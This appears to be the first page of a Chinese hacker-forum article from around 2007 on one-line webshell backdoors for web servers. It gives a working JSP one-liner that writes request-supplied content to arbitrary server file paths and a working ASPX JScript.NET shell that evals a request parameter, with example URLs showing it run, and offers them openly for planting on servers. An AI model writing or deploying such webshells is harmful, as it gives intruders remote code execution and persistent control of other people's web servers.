首先回顾一下以前ASP一句话的经典木马吧！ VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的！网上也有例子我就不多说了！.....

然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了！之前ASP中正常情况只支持VBS JSCRIPT(像python perlscript 这些特例的我就不说了)...

如今ASPX中 所支持的VBS的高级版本VB已经不存在execute这个独有的方法....真遗憾....同时Jscript 也一样转向高级版本Jscript.net 但是我们需要的eval函数还是生存下来的！script child有幸了...

先埋下一个伏笔吧~ 先谈谈如今的中间语言WEB应用中的一句话
JSP :

以下是引用片段： <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

这个是我自己写的 要弹要说,都是大家的 呵呵！我不发言.....

ASPX:

这个不知道是谁的作品,感觉性质有点像我的JSP一句话了！不过还是把简单的shell实现了！支持 ing....

两个一句话大体都一样 调用类把 接收的都写到文件！简单说就是对文件写操作而已！~昔日ASP一句话的光辉如今在中间语言的后门中给限制得荡然无存~~错！......ASPX C/S木马我们一样可以实现！因为有Jscript.net的存在！上面所说到的eval函数还生存着！~

OK我们先来实现

以下是引用片段： <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["nonamed"]));%>

这样？恩！可以拿去尝试了~ 保存为 text.aspx 然后提交

以下是引用片段： http://127.0.0.1/text.aspx?nonamed=var%20mydate%20=%20new%20Date();

打印出当前时间...Sat Aug 4 20:05:20 UTC+8 2007
貌似OK了哦！ 呵呵 我们再试

以下是引用片段： http://127.0.0.1/text.aspx?nonamed=Server.MapPath(".");

发现报告错误了！....(我就是因为卡在这里,所以折腾了几个月,不然这文章早出炉了！在这里感谢一下 闇の術士 QQ:4659675 欢迎大家找他学习 ...哈)

[1] [2] 下一页